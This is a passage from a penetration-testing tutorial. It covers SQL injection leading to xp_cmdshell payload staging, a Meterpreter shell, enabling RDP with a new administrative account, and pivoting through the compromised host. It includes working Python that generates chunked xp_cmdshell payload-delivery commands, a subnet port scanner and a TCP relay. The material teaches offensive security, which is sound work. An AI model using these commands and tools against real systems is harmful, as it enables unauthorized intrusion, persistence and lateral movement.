
Simulated Penetration Test


[+] Prepping the payload for delivery. [+]
Sending chunk 1 of 8, this may take a bit...
Sending chunk 2 of 8, this may take a bit...

. . . SNIP . . .

Using H2B Bypass to convert our Payload to Binary..
Running cleanup before launching the payload....
[+] Launching the PAYLOAD!! This may take up to two or three minutes. [+]

This should look familiar. We've essentially attacked the web application through Fast-Track and exploited it via SQL injection. We used the xp_cmdshell stored procedure to write the payload to the target's disk as hex, a few chunks at a time, converted it back to binary on the target, and ended up with a full-fledged Meterpreter shell.
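The chunked hex delivery that the Fast-Track output above reports ("Sending chunk 1 of 8", "Using H2B Bypass to convert our Payload to Binary"), as an added example written for this page and not Fast-Track's own code: a payload is hex-encoded, cut into pieces small enough for one echo command each, and every piece is wrapped in an xp_cmdshell statement that appends to a stage file on the target; a second function reproduces what cmd.exe leaves on disk and converts it back to binary. The stage path C:\Windows\Temp\payload.hex, the chunk size and the sample payload bytes are assumptions made for the demo.

```python
"""Added illustration of binary-to-hex delivery through xp_cmdshell.
Not Fast-Track's code; stage path, chunk size and sample payload are assumed."""
import binascii
import re

STAGE_PATH = r"C:\Windows\Temp\payload.hex"   # assumed drop location on the target


def hex_chunks(payload: bytes, chunk_size: int = 1000):
    """Upper-case hex of the payload, cut into strings of at most chunk_size
    characters. chunk_size must be even so no byte straddles two commands."""
    if chunk_size < 2 or chunk_size % 2:
        raise ValueError("chunk_size must be an even number >= 2")
    hexed = binascii.hexlify(payload).decode("ascii").upper()
    return [hexed[i:i + chunk_size] for i in range(0, len(hexed), chunk_size)]


def xp_cmdshell_commands(payload: bytes, chunk_size: int = 1000, path: str = STAGE_PATH):
    """One EXEC master..xp_cmdshell statement per chunk. The hex alphabet has
    no quote or shell metacharacter, so nothing needs escaping inside the
    injected string or in cmd.exe. The first chunk overwrites (>) the stage
    file so a stale file from an earlier run cannot corrupt the result;
    later chunks append (>>)."""
    commands = []
    for index, chunk in enumerate(hex_chunks(payload, chunk_size)):
        redirect = ">" if index == 0 else ">>"
        commands.append(f"EXEC master..xp_cmdshell 'echo {chunk} {redirect} {path}'")
    return commands


def simulate_target_file(commands):
    """What cmd.exe writes on the target: each echo stores its argument
    followed by CRLF."""
    return "".join(re.search(r"echo ([0-9A-F]+) >", c).group(1) + "\r\n" for c in commands)


def hex_to_binary(hex_text: str) -> bytes:
    """Target-side hex-to-binary step. The line endings echo added must be
    dropped before unhexlify, or the conversion fails on the first CR."""
    return binascii.unhexlify("".join(hex_text.split()))


# Constructed stand-in for a payload: a PE-looking header plus filler bytes.
SAMPLE_PAYLOAD = b"MZ" + bytes(range(256)) * 4

if __name__ == "__main__":
    cmds = xp_cmdshell_commands(SAMPLE_PAYLOAD)
    print(f"{len(cmds)} chunks, first statement:\n{cmds[0][:80]}...")
    assert hex_to_binary(simulate_target_file(cmds)) == SAMPLE_PAYLOAD
```

Two details matter in practice: the chunk size is bounded by the command-line length the injection point and cmd.exe will carry, and the target-side converter must ignore the CRLF that every echo appends, otherwise the reassembled hex is not a valid byte string.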

Post Exploitation

At this point, we should have a Meterpreter console running in the background within msfconsole, so we can begin to scan the target's subnet for other live systems. To do this, we'll upload nmap to the target and run it from the Windows machine.

First, download nmap from insecure.org in an executable format and save it locally; we'll be uploading this to our target. Next, from our Meterpreter session, we'll use the getgui Meterpreter script to enable Microsoft's Remote Desktop Protocol (RDP), a built-in graphical remote administration protocol that lets you interact with the Windows desktop as if you were sitting in front of the remote machine, to forward the target's RDP port (3389) back through the Meterpreter session to port 8080 on our machine (the -e and -f options below), and to add a new administrative user to the system. Each of those steps, enabling RDP, opening the firewall port and creating an account, changes the target's configuration, so record them: they must be reverted when the engagement ends.

We enter rdesktop localhost:8080 from Back|Track's command line, so we can log into the system with the newly created user account. We then use Meterpreter to upload nmap to the target. Our goal is to install nmap on the compromised Windows target and use the system as a staging ground for further attacks. Alternatively, you could use scanner/portscan/syn and scanner/portscan/tcp to port scan directly through Metasploit, after adding a route to the target's subnet through the Meterpreter session so the modules can reach it. The choice is a matter of personal preference and needs.
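The subnet sweep the text hands to nmap or to scanner/portscan/tcp, as an added example written for this page (it is neither nmap nor Metasploit's module): a threaded TCP connect scan over a CIDR range that reports which hosts answer on which ports. The helper at the bottom starts a listener bound to 127.0.0.1 so the scan can be exercised offline against 127.0.0.0/30, an assumption for the demo.

```python
"""Added example: TCP connect scan across a CIDR range. Not nmap and not
Metasploit's scanner/portscan/tcp; the demo listener and 127.0.0.0/30 are
assumptions so it runs offline."""
import ipaddress
import socket
from concurrent.futures import ThreadPoolExecutor


def probe(host: str, port: int, timeout: float = 0.5) -> bool:
    """True when a full TCP handshake completes, i.e. the port is open.
    Refused, filtered (timeout) and unreachable all count as closed here,
    which is all a connect scan can tell apart without raw sockets."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def scan(network: str, ports, timeout: float = 0.5, workers: int = 64):
    """Return {host: [open ports]} for hosts in the CIDR range that answer
    on at least one port. hosts() leaves out the network and broadcast
    addresses, which a sweep of a range like 10.0.0.0/24 would skip too."""
    net = ipaddress.ip_network(network, strict=False)
    targets = [(str(host), port) for host in net.hosts() for port in ports]
    results = {}
    with ThreadPoolExecutor(max_workers=workers) as pool:
        outcomes = pool.map(lambda t: probe(t[0], t[1], timeout), targets)
        for (host, port), is_open in zip(targets, outcomes):
            if is_open:
                results.setdefault(host, []).append(port)
    return results


def start_demo_listener():
    """Constructed target for an offline run: a listening socket bound to
    127.0.0.1 only, plus a port that was just released and so is closed."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(8)
    spare = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    spare.bind(("127.0.0.1", 0))
    closed_port = spare.getsockname()[1]
    spare.close()
    return listener, listener.getsockname()[1], closed_port


if __name__ == "__main__":
    listener, open_port, closed_port = start_demo_listener()
    print(scan("127.0.0.0/30", [open_port, closed_port]))
    listener.close()
```

Run against a real subnet the worker count and timeout are the knobs that trade speed for noise; a connect scan completes the handshake on every open port, so it shows up in the target's service logs, which is the same trade-off the text leaves to personal preference.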

meterpreter > run getgui -e -f 8080
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Enabling Remote Desktop
[*] RDP is already enabled
[*] Setting Terminal Services service startup mode
[*] Terminal Services service is already set to auto
[*] Opening port in local firewall if necessary
[*] Starting the port forwarding at local port 8080
[*] Local TCP relay created: 0.0.0.0:8080 <-> 127.0.0.1:3389
meterpreter > shell
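The relay that the getgui output reports as "Local TCP relay created: 0.0.0.0:8080 <-> 127.0.0.1:3389", as an added example written for this page and not Metasploit's portfwd code: Metasploit carries the far leg over the Meterpreter session, whereas this version connects to the destination directly, so it shows only the listener-and-pump half that rdesktop talks to. The echo server is a constructed stand-in for the RDP service, and the loopback addresses and ephemeral ports are chosen so it runs offline.

```python
"""Added example: a TCP relay of the kind getgui -f sets up. Not Metasploit's
portfwd; the echo server stands in for RDP and all ports are ephemeral."""
import socket
import threading


def _pump(src: socket.socket, dst: socket.socket) -> None:
    """Copy bytes one way until src reports EOF, then half-close dst so the
    peer sees the same EOF instead of a hung connection."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def _handle(client: socket.socket, target) -> None:
    """One relayed connection: open the far leg and pump both directions."""
    try:
        remote = socket.create_connection(target)
    except OSError:
        client.close()
        return
    pumps = [threading.Thread(target=_pump, args=(client, remote), daemon=True),
             threading.Thread(target=_pump, args=(remote, client), daemon=True)]
    for p in pumps:
        p.start()
    for p in pumps:
        p.join()
    client.close()
    remote.close()


class TcpRelay:
    """Listen on bind_host:bind_port and relay every client to target.
    bind_port 0 asks the OS for a free port, exposed as .port."""

    def __init__(self, bind_host: str, bind_port: int, target):
        self.target = target
        self.listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.listener.bind((bind_host, bind_port))
        self.listener.listen(8)
        self.port = self.listener.getsockname()[1]
        self._thread = threading.Thread(target=self._serve, daemon=True)

    def start(self):
        self._thread.start()
        return self

    def _serve(self):
        while True:
            try:
                client, _ = self.listener.accept()
            except OSError:          # listener closed by close()
                return
            threading.Thread(target=_handle, args=(client, self.target), daemon=True).start()

    def close(self):
        self.listener.close()


def start_echo_server() -> socket.socket:
    """Constructed stand-in for the service behind the relay (the demo's 3389)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve():
        conn, _ = srv.accept()
        with conn:
            while True:
                data = conn.recv(4096)
                if not data:
                    break
                conn.sendall(data)

    threading.Thread(target=serve, daemon=True).start()
    return srv


def relay_roundtrip(payload: bytes) -> bytes:
    """Send payload through the relay to the echo server; return what came back."""
    echo = start_echo_server()
    relay = TcpRelay("127.0.0.1", 0, echo.getsockname()).start()
    chunks = []
    with socket.create_connection(("127.0.0.1", relay.port)) as c:
        c.sendall(payload)
        c.shutdown(socket.SHUT_WR)
        while True:
            data = c.recv(4096)
            if not data:
                break
            chunks.append(data)
    relay.close()
    echo.close()
    return b"".join(chunks)


if __name__ == "__main__":
    print(relay_roundtrip(b"through the pivot"))
```

One operational caveat the getgui output makes visible: the relay binds 0.0.0.0, so anyone who can reach the attacking machine on port 8080 gets a path to the target's RDP service for as long as the forward is up; bind to 127.0.0.1 unless another host really needs to use the pivot.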